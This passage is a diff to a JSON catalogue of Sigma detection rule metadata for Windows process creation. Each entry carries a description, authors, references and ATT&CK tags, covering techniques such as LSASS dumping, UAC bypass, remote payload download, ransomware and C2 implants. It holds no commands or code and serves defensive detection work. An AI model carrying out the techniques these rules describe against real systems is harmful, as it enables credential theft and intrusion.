"proc_creation_win_query_session_exfil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "value": "Query Usage To Exfil Data" + }, + { + "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_lolbin_pktmon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pktmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "value": "Use of PktMon.exe" + }, + { + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/12", + "falsepositive": [ + "App-V clients" + ], + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code" + }, + { + "description": "Downloads payload from remote server", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_msoffice.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Reegun J (OCBC Bank)", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", + "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "value": "Malicious Payload Download via Office Binaries" + }, + { + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/08/26", + "falsepositive": [ + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + ], + "filename": "proc_creation_win_crime_snatch_ransomware.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ] + }, + "uuid": "5325945e-f1f0-406e-97b8-65104d393fff", + "value": "Snatch Ransomware" + }, + { + "description": "Detects indicators of a UAC bypass method by mocking directories", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_uac_bypass_trustedpath.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/netero1010/TrustedPath-UACBypass-BOF", + "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "value": "TrustedPath UAC Bypass Pattern" + }, + { + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/01", + "falsepositive": [ + "Legitimate use by a software developer" + ], + "filename": "proc_creation_win_lolbin_wfc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "value": "Use of Wfc.exe" + }, + { + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_bitsadmin_download_susp_ip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "99c840f2-2012-46fd-9141-c761987550ef", + "value": "Bitsadmin Download File from IP" + }, + { + "description": "Detects a suspicious LSASS process process clone that could be a sign of process dumping activity", + "meta": { + "author": "Florian Roth, Samir Bousseaden", + "creation_date": "2021/11/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_lsass_clone.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Hexacorn/status/1420053502554951689", + "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", + "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" + ] + }, + "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "value": "Suspicious LSASS Process Clone" + }, + { + "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", + "meta": { + "author": "Micah Babinski", + "creation_date": "2022/12/11", + "falsepositive": [ + "Legitimate use of the tool by administrators or users to update metadata of a binary" + ], + "filename": "proc_creation_win_susp_rcedit_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/electron/rcedit", + "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", + "https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rcedit_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003", + "attack.t1036", + "attack.t1027.005", + "attack.t1027" + ] + }, + "uuid": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", + "value": "Potential PE Metadata Tamper Using Rcedit" + }, + { + "description": "Detects base64 encoded listing Win32_Shadowcopy", + "meta": { + "author": "Christian Burkard", + "creation_date": "2022/03/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_base64_listing_shadowcopy.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_listing_shadowcopy.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "47688f1b-9f51-4656-b013-3cc49a166a36", + "value": "Base64 Encoded Listing of Shadowcopy" + }, + { + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_shellexec_rundll_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "d87bd452-6da1-456e-8155-7dc988157b7d", + "value": "Suspicious Usage Of ShellExec_RunDLL" + }, + { + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/10", + "falsepositive": [ + "Other parent binaries using GUP not currently identified" + ], + "filename": "proc_creation_win_susp_gup_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535322445439180803", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43", + "value": "Execute Arbitrary Binaries Using GUP Utility" + }, + { + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", + "meta": { + "author": "frack113", + "creation_date": "2022/05/16", + "falsepositive": [ + "Legitimate uses of logon scripts distributed via group policy" + ], + "filename": "proc_creation_win_lolbin_gpscript.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", + "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "1e59c230-6670-45bf-83b0-98903780607e", + "value": "Gpscript Execution" + }, + { + "description": "Detects nltest commands that can be used for information discovery", + "meta": { + "author": "Craig Young, oscd.community, Georg Lauenstein", + "creation_date": "2021/07/24", + "falsepositive": [ + "Legitimate administration use but user must be check out" + ], + "filename": "proc_creation_win_nltest_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1482/", + "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", + "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://attack.mitre.org/techniques/T1016/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016", + "attack.t1482" + ] + }, + "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "value": "Recon Activity with NLTEST" + }, + { + "description": "Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware", + "meta": { + "author": "Sander Wiebing", + "creation_date": "2020/05/23", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_allow_port_rdp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "value": "Netsh RDP Port Opening" + }, + { + "description": "Detects the Installation of a Exchange Transport Agent", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/08", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + ], + "filename": "proc_creation_win_win_exchange_transportagent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win_exchange_transportagent.yml" ], "tags": [ "attack.persistence", - "attack.t1053.005", - "attack.s0111" + "attack.t1505.002" ] }, - "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0", - "value": "Defrag Deactivation" + "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f", + "value": "MSExchange Transport Agent Installation" + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "meta": { + "author": "Nik Seetharaman", + "creation_date": "2018/07/16", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "filename": "proc_creation_win_cmstp_execution_by_creation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ] + }, + "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "value": "CMSTP Execution Process Creation" + }, + { + "description": "Detects WannaCry ransomware activity", + "meta": { + "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_wannacry.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" + ] + }, + "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079", + "value": "WannaCry Ransomware" + }, + { + "description": "schtasks.exe create task from user AppData\\Local\\Temp", + "meta": { + "author": "frack113", + "creation_date": "2021/11/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_user_temp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_user_temp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8", + "value": "Suspicious Add Scheduled Task From User AppData Temp" + }, + { + "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio", + "meta": { + "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", + "creation_date": "2018/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_shell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "438025f9-5856-4663-83f7-52f878a70a50", + "value": "Microsoft Office Product Spawning Windows Shell" + }, + { + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "meta": { + "author": "Sami Ruohonen, Harish Segar (improvement), Tim Shelton", + "creation_date": "2018/09/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_xor_commandline.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" + ] + }, + "uuid": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "value": "Suspicious XOR Encoded PowerShell Command Line" + }, + { + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hack_sharpersist.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", + "https://github.com/mandiant/SharPersist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053" + ] + }, + "uuid": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "value": "SharPersist Usage" + }, + { + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" + ], + "filename": "proc_creation_win_susp_direct_asep_reg_keys_modification.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", + "value": "Direct Autorun Keys Modification" + }, + { + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/20", + "falsepositive": [ + "Other programs that use these command line option and accepts an 'All' parameter" + ], + "filename": "proc_creation_win_hack_bloodhound.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/BloodHoundAD/SharpHound", + "https://github.com/BloodHoundAD/BloodHound", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "value": "Bloodhound and Sharphound Hack Tool" + }, + { + "description": "Detects WMIC executions in which a event consumer gets created in order to establish persistence", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/25", + "falsepositive": [ + "Legitimate software creating script event consumers" + ], + "filename": "proc_creation_win_susp_wmic_eventconsumer_create.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", + "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", + "value": "Suspicious WMIC ActiveScriptEventConsumer Creation" + }, + { + "description": "Detects WMI script event consumers", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2018/03/07", + "falsepositive": [ + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + ], + "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ] + }, + "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "value": "WMI Persistence - Script Event Consumer" + }, + { + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "meta": { + "author": "Nasreddine Bencherchali, Florian Roth", + "creation_date": "2022/08/25", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_c2_sliver.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c2_sliver.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "42333b2c-b425-441c-b70e-99404a17170f", + "value": "Sliver C2 Implant Activity Pattern" + }, + { + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ntdll_type_redirect.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.x86matthew.com/view_post?id=ntdll_pipe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "value": "Suspicious Ntdll Pipe Redirection" + }, + { + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "meta": { + "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "creation_date": "2021/05/20", + "falsepositive": [ + "Legitimate WinRM usage" + ], + "filename": "proc_creation_win_susp_shell_spawn_from_winrm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_winrm.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "value": "Suspicious Processes Spawned by WinRM" + }, + { + "description": "Detects inline execution of PowerShell code from a file", + "meta": { + "author": "frack113", + "creation_date": "2022/12/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ps_exec_data_file.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ps_exec_data_file.yml" + ], + "tags": "No established tags" + }, + "uuid": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", + "value": "Powershell Inline Execution From A File" + }, + { + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "meta": { + "author": "David Burkett, @signalblur", + "creation_date": "2019/12/28", + "falsepositive": [ + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + ], + "filename": "proc_creation_win_susp_svchost_no_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost_no_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "16c37b52-b141-42a5-a3ea-bbe098444397", + "value": "Suspect Svchost Activity" + }, + { + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "meta": { + "author": "Alfie Champion (ajpc500)", + "creation_date": "2021/06/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_c3_load_by_rundll32.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c3_load_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "value": "F-Secure C3 Load by Rundll32" + }, + { + "description": "detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking", + "meta": { + "author": "xknow @xknow_infosec, Tim Shelton", + "creation_date": "2020/06/11", + "falsepositive": [ + "(not much) some benign Java tools may product false-positive commandlines for loading libraries" + ], + "filename": "proc_creation_win_commandline_path_traversal.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Oddvarmoe/status/1270633613449723905", + "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1", + "value": "Cmd.exe CommandLine Path Traversal" + }, + { + "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/22", + "falsepositive": [ + "Legitimate use of the PDQDeploy tool to execute these commands" + ], + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/malmoeb/status/1550483085472432128", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", + "value": "Suspicious Execution Of PDQDeployRunner" + }, + { + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_sigverif.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", + "https://twitter.com/0gtweet/status/1457676633809330184", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "value": "Suspicious Sigverif Execution" + }, + { + "description": "Detects specific encoding method of cOnvErTTO-SECUreStRIng in the PowerShell command lines", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + 